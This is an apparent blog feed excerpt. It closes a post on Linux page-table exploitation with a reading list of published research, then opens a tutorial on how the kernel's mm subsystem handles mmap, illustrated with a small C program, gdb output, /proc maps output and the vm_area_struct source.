<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&ldquo;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&rdquo;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (2023) (x86_64) exploit write-up</li>
<li><a href="https://pwning.tech/nftables/">&ldquo;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&rdquo;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing</li>
<li>PageJack (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) (2024) technique overview</li>
<li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (2024) (aarch64) exploit slides</li>
<li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (2024) (aarch64) exploit slides</li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/">CVE-2022-22265 Samsung npu driver</a> (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX</li>
<li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793)</a> (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries</li>
</ol>
<p>RE internals and more background reading:</p>
<ol>
<li><a href="https://docs.kernel.org/mm/page_tables.html">Page Tables - Linux Kernel Docs</a> are a good place to start on fundamentals</li>
<li>Check out my <a href="https://sam4k.com/linternals/">Linternals series</a> for rundowns on page allocators and mm basics</li>
<li><a href="https://syst3mfailure.io/linux-page-allocator/">A Quick Dive Into The Linux Kernel Page Allocator</a> (2025) is a great look into the kernel&rsquo;s page allocator</li>
</ol>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2025/05/job_done.gif" alt=""></p>
<p>Boom, we did it! This has been a fun one to write, hopefully it&rsquo;s, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.</p>
<p>It&rsquo;s part of the broader cat and mouse game of security research: as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we&rsquo;ve seen, by exploiting page tables and using physical memory addressing, we&rsquo;re essentially able to operate &ldquo;under&rdquo; the purview of traditional mitigations, such as the permission checks done at the virtual address level.</p>
<p>That said, it&rsquo;s not quite the wild west, as, while not widespread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!</p>
<p>If you&rsquo;re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I&rsquo;ll be touching on that in the next part of <a href="https://sam4k.com/linternals/#memory-management">my <code>mm</code> series</a>.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>Linternals: Exploring The mm Subsystem via mmap [0x02]</title><description>In this part we&amp;#39;ll use our case study to explore how the Linux kernel maps private anonymous memory.</description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-2/</link><guid isPermaLink="false">675f0187de619fc1154efe9b</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 25 Apr 2025 15:17:34 +0000</pubDate><media:content url="https://sam4k.com/content/images/2025/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Welcome back! <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">Last time</a> I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I&rsquo;ll keep the intro brief.</p>
<p>The aim of this series is to explore the inner workings of the Linux kernel&rsquo;s memory management (mm) subsystem by examining how this simple program is implemented:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">void</span> <span class="o">*</span><span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="p">(</span><span class="kt">long</span><span class="o">*</span><span class="p">)</span><span class="n">addr</span> <span class="o">=</span> <span class="mh">0x4142434445464748</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>While I&rsquo;m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.</p>
<p>In the <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">first part</a> of the series we covered:</p>
<ul>
<li>What memory management is and a brief overview of the kernel&rsquo;s mm subsystem</li>
<li>What our simple program does from the user&rsquo;s perspective and how it interacts with the kernel (it&rsquo;s only like 2 syscalls, how much could there be to cover&hellip;)</li>
<li>The start of our journey: how memory is mapped via the <code>mmap()</code> system call - argument marshalling, fetching the <code>mm_struct</code>, a bit of security, locking - right up until the actual implementation in <code>do_mmap()</code> anyway (sorry, that really was a cliffhanger)</li>
</ul>
<p>So without further ado, let&rsquo;s dive back into how (anonymous) memory is mapped via <code>mmap()</code>!</p>
<p><img src="https://sam4k.com/content/images/2025/04/lets_do_this.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#mapping-memory-cont">Mapping Memory (cont.)</a>
<ul>
<li><a href="#what-are-mappings">What Are Mappings?</a>
<ul>
<li><a href="#struct-vmareastruct"><code>struct vm_area_struct</code></a></li>
<li><a href="#mm-mmmt"><code>mm-&gt;mm_mt</code></a></li>
</ul>
</li>
<li><a href="#dommap"><code>do_mmap()</code></a>
<ul>
<li><a href="#finding-a-suitable-addr">Finding A Suitable <code>addr</code></a></li>
</ul>
</li>
<li><a href="#mmapregion"><code>mmap_region()</code></a>
<ul>
<li><a href="#vma-merging">VMA Merging</a></li>
<li><a href="#vma-allocation">VMA Allocation</a></li>
</ul>
</li>
<li><a href="#final-bits">Final Bits</a></li>
<li><a href="#summary">Summary</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<h2 id="mapping-memory-cont">Mapping Memory (cont.)</h2>
<p>Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we&rsquo;re digging into the first part:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span></code></pre></div><p>Let&rsquo;s quickly recap how deep in the mm subsystem we are, since making our <code>mmap(2)</code> system call from our userspace program. Using gdb we can set a breakpoint on <code>do_mmap()</code>, which is where we left off, and check the backtrace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
</span></span><span class="line"><span class="cl">    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
</span></span><span class="line"><span class="cl">#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    prot=&lt;optimized out&gt;, flag=&lt;optimized out&gt;, pgoff=&lt;optimized out&gt;) at mm/util.c:556
</span></span><span class="line"><span class="cl">#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=&lt;optimized out&gt;, pgoff=0) at mm/mmap.c:1427
</span></span><span class="line"><span class="cl">#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=&lt;optimized out&gt;, flags=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    fd=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
</span></span><span class="line"><span class="cl">#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
</span></span><span class="line"><span class="cl">#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:51
</span></span><span class="line"><span class="cl">#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:81
</span></span><span class="line"><span class="cl">#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>backtrace for our program&rsquo;s mmap() call (on a 6.11.5 kernel)</p>
<p>So far these functions have mostly been sanitising arguments, doing necessary security checks and taking the all-important <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117"><code>mmap_write_lock_killable(mm)</code></a>.</p>
<p>Before we continue where we left off, about to dive into <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410"><code>do_mmap()</code></a>, I&rsquo;m going to touch on some key background which will provide important context for the rest of the post!</p>
<h3 id="what-are-mappings">What Are Mappings?</h3>
<p>We probably shouldn&rsquo;t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.</p>
<p>When we call <a href="https://man7.org/linux/man-pages/man2/mmap.2.html"><code>mmap()</code></a> in our userspace program, we&rsquo;re looking to &ldquo;map&rdquo; some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our process&rsquo;s virtual address space.</p>
<p>So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a process&rsquo;s mappings via <code>procfs</code>. Let&rsquo;s see if we can find our program&rsquo;s <code>0x1000</code> byte mapping:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">$</span> <span class="n">cat</span> <span class="o">/</span><span class="n">proc</span><span class="o">/</span><span class="mi">91280</span><span class="o">/</span><span class="n">maps</span>
</span></span><span class="line"><span class="cl"><span class="mi">00400000</span><span class="o">-</span><span class="mi">00401000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">00401000</span><span class="o">-</span><span class="mi">0047</span><span class="n">c000</span> <span class="n">r</span><span class="o">-</span><span class="n">xp</span> <span class="mi">00001000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">0047</span><span class="n">c000</span><span class="o">-</span><span class="mi">004</span><span class="n">a4000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">0007</span><span class="n">c000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">a4000</span><span class="o">-</span><span class="mi">004</span><span class="n">a9000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">000</span><span class="n">a3000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">a9000</span><span class="o">-</span><span class="mi">004</span><span class="n">ab000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">000</span><span class="n">a8000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">2</span><span class="n">b</span> <span class="mi">12253872</span>                           <span class="n">mm_example</span>
</span></span><span class="line"><span class="cl"><span class="mi">004</span><span class="n">ab000</span><span class="o">-</span><span class="mi">004</span><span class="n">b1000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span> 
</span></span><span class="line"><span class="cl"><span class="mi">15</span><span class="n">b3e000</span><span class="o">-</span><span class="mi">15</span><span class="n">b60000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                                  <span class="p">[</span><span class="n">heap</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60a000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60b000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span> 
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60b000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60d000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vvar</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60d000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60f000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vvar_vclock</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60f000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e611000</span> <span class="n">r</span><span class="o">-</span><span class="n">xp</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vdso</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">ffd933f4000</span><span class="o">-</span><span class="mi">7</span><span class="n">ffd93415000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">stack</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">ffffffffff600000</span><span class="o">-</span><span class="n">ffffffffff601000</span> <span class="o">--</span><span class="n">xp</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                  <span class="p">[</span><span class="n">vsyscall</span><span class="p">]</span>
</span></span></code></pre></div><p>We can see even our simple program has quite a few mappings, but let&rsquo;s not get distracted! There, at <code>7f556e60a000</code>, we can see our anonymous mapping! It spans <code>0x1000</code> bytes and has the <code>rw</code> permissions we expect, neat!</p>
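<p>If you&rsquo;d rather not eyeball <code>procfs</code> by hand, the same lookup can be sketched from inside the program. This is a minimal sketch, assuming a Linux system with <code>/proc</code> mounted; <code>map_one_page()</code> and <code>find_mapping()</code> are hypothetical helper names of mine, not anything from the kernel or libc. It matches on containment rather than an exact start address, since the kernel may merge adjacent anonymous areas with identical permissions into one line.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Map one anonymous, private, read/write page (same call as our example). */
static void *map_one_page(void)
{
	return mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
		    MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
}

/*
 * Hypothetical helper: scan /proc/self/maps for the area containing addr.
 * On success, fills in the area's [start, end) range and its 4-character
 * permission string (perms must hold at least 5 bytes) and returns 0.
 * Returns -1 if nothing matches or the file cannot be opened.
 */
static int find_mapping(const void *addr, unsigned long *start,
			unsigned long *end, char perms[5])
{
	FILE *maps = fopen("/proc/self/maps", "r");
	char line[512];
	int ret = -1;

	if (!maps)
		return -1;

	while (fgets(line, sizeof(line), maps)) {
		unsigned long lo, hi;
		char p[5];

		/* Each line starts with "start-end perms ...". */
		if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) != 3)
			continue;

		if ((unsigned long)addr >= lo && (unsigned long)addr < hi) {
			*start = lo;
			*end = hi;
			memcpy(perms, p, sizeof(p));
			ret = 0;
			break;
		}
	}

	fclose(maps);
	return ret;
}
```

<p>Calling <code>find_mapping()</code> on the pointer returned by <code>map_one_page()</code> should hand back a range covering the page and a permission string of <code>rw-p</code>, matching the line we picked out above.</p>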
<p>So now we have a general idea of what a mapping is, how exactly does the kernel represent and manage our process&rsquo;s mappings? Cue <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664"><code>struct vm_area_struct</code></a>!</p>
<h4 id="struct-vmareastruct"><code>struct vm_area_struct</code></h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/*</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">This</span> <span class="n">struct</span> <span class="n">describes</span> <span class="n">a</span> <span class="n">virtual</span> <span class="n">memory</span> <span class="n">area</span><span class="o">.</span> <span class="n">There</span> <span class="n">is</span> <span class="n">one</span> <span class="n">of</span> <span class="n">these</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">per</span> <span class="n">VM</span><span class="o">-</span><span class="n">area</span><span class="o">/</span><span class="n">task</span><span class="o">.</span> <span class="n">A</span> <span class="n">VM</span> <span class="n">area</span> <span class="n">is</span> <span class="n">any</span> <span class="n">part</span> <span class="n">of</span> <span class="n">the</span> <span class="n">process</span> <span class="n">virtual</span> <span class="n">memory</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">space</span> <span class="n">that</span> <span class="n">has</span> <span class="n">a</span> <span class="n">special</span> <span class="n">rule</span> <span class="k">for</span> <span class="n">the</span> <span class="n">page</span><span class="o">-</span><span class="n">fault</span> <span class="n">handlers</span> <span class="p">(</span><span class="n">ie</span> <span class="n">a</span> <span class="n">shared</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">library</span><span class="p">,</span> <span class="n">the</span> <span class="n">executable</span> <span class="n">area</span> <span class="n">etc</span><span class="p">)</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span> <span class="n">vm_area_struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="o">/*</span> <span class="n">VMA</span> <span class="n">covers</span> <span class="p">[</span><span class="n">vm_start</span><span class="p">;</span> <span class="n">vm_end</span><span class="p">)</span> <span class="n">addresses</span> <span class="n">within</span> <span class="n">mm</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">			<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_start</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_end</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_PER_VMA_LOCK</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="n">rcu_head</span> <span class="n">vm_rcu</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">Used</span> <span class="k">for</span> <span class="n">deferred</span> <span class="n">freeing</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">vm_mm</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">The</span> <span class="n">address</span> <span class="n">space</span> <span class="n">we</span> <span class="n">belong</span> <span class="n">to</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">pgprot_t</span> <span class="n">vm_page_prot</span><span class="p">;</span>          <span class="o">/*</span> <span class="n">Access</span> <span class="n">permissions</span> <span class="n">of</span> <span class="n">this</span> <span class="n">VMA</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">vm_flags_t</span> <span class="n">__private</span> <span class="n">__vm_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_PER_VMA_LOCK</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Flag</span> <span class="n">to</span> <span class="n">indicate</span> <span class="n">areas</span> <span class="n">detached</span> <span class="n">from</span> <span class="n">the</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">mm_mt</span> <span class="n">tree</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="ne">bool</span> <span class="n">detached</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="ne">int</span> <span class="n">vm_lock_seq</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vma_lock</span> <span class="o">*</span><span class="n">vm_lock</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">For</span> <span class="n">areas</span> <span class="n">with</span> <span class="n">an</span> <span class="n">address</span> <span class="n">space</span> <span class="ow">and</span> <span class="n">backing</span> <span class="n">store</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">linkage</span> <span class="n">into</span> <span class="n">the</span> <span class="n">address_space</span><span class="o">-&gt;</span><span class="n">i_mmap</span> <span class="n">interval</span> <span class="n">tree</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="n">rb_node</span> <span class="n">rb</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">unsigned</span> <span class="n">long</span> <span class="n">rb_subtree_last</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="n">shared</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">A</span> <span class="n">file</span><span class="s1">&#39;s MAP_PRIVATE vma can be in both i_mmap tree and anon_vma</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">list</span><span class="p">,</span> <span class="n">after</span> <span class="n">a</span> <span class="n">COW</span> <span class="n">of</span> <span class="n">one</span> <span class="n">of</span> <span class="n">the</span> <span class="n">file</span> <span class="n">pages</span><span class="o">.</span>	<span class="n">A</span> <span class="n">MAP_SHARED</span> <span class="n">vma</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">can</span> <span class="n">only</span> <span class="n">be</span> <span class="ow">in</span> <span class="n">the</span> <span class="n">i_mmap</span> <span class="n">tree</span><span class="o">.</span>  <span class="n">An</span> <span class="n">anonymous</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="n">stack</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="ow">or</span> <span class="n">brk</span> <span class="n">vma</span> <span class="p">(</span><span class="n">with</span> <span class="n">NULL</span> <span class="n">file</span><span class="p">)</span> <span class="n">can</span> <span class="n">only</span> <span class="n">be</span> <span class="ow">in</span> <span class="n">an</span> <span class="n">anon_vma</span> <span class="n">list</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">list_head</span> <span class="n">anon_vma_chain</span><span class="p">;</span> <span class="o">/*</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">mmap_lock</span> <span class="o">&amp;</span>
</span></span><span class="line"><span class="cl">					  <span class="o">*</span> <span class="n">page_table_lock</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">anon_vma</span> <span class="o">*</span><span class="n">anon_vma</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">page_table_lock</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Function</span> <span class="n">pointers</span> <span class="n">to</span> <span class="n">deal</span> <span class="n">with</span> <span class="n">this</span> <span class="n">struct</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="k">const</span> <span class="n">struct</span> <span class="n">vm_operations_struct</span> <span class="o">*</span><span class="n">vm_ops</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Information</span> <span class="n">about</span> <span class="n">our</span> <span class="n">backing</span> <span class="n">store</span><span class="p">:</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_pgoff</span><span class="p">;</span>		<span class="o">/*</span> <span class="n">Offset</span> <span class="p">(</span><span class="n">within</span> <span class="n">vm_file</span><span class="p">)</span> <span class="ow">in</span> <span class="n">PAGE_SIZE</span>
</span></span><span class="line"><span class="cl">					   <span class="n">units</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">file</span> <span class="o">*</span> <span class="n">vm_file</span><span class="p">;</span>		<span class="o">/*</span> <span class="ne">File</span> <span class="n">we</span> <span class="n">map</span> <span class="n">to</span> <span class="p">(</span><span class="n">can</span> <span class="n">be</span> <span class="n">NULL</span><span class="p">)</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">void</span> <span class="o">*</span> <span class="n">vm_private_data</span><span class="p">;</span>		<span class="o">/*</span> <span class="n">was</span> <span class="n">vm_pte</span> <span class="p">(</span><span class="n">shared</span> <span class="n">mem</span><span class="p">)</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_ANON_VMA_NAME</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">For</span> <span class="n">private</span> <span class="ow">and</span> <span class="n">shared</span> <span class="n">anonymous</span> <span class="n">mappings</span><span class="p">,</span> <span class="n">a</span> <span class="n">pointer</span> <span class="n">to</span> <span class="n">a</span> <span class="n">null</span>
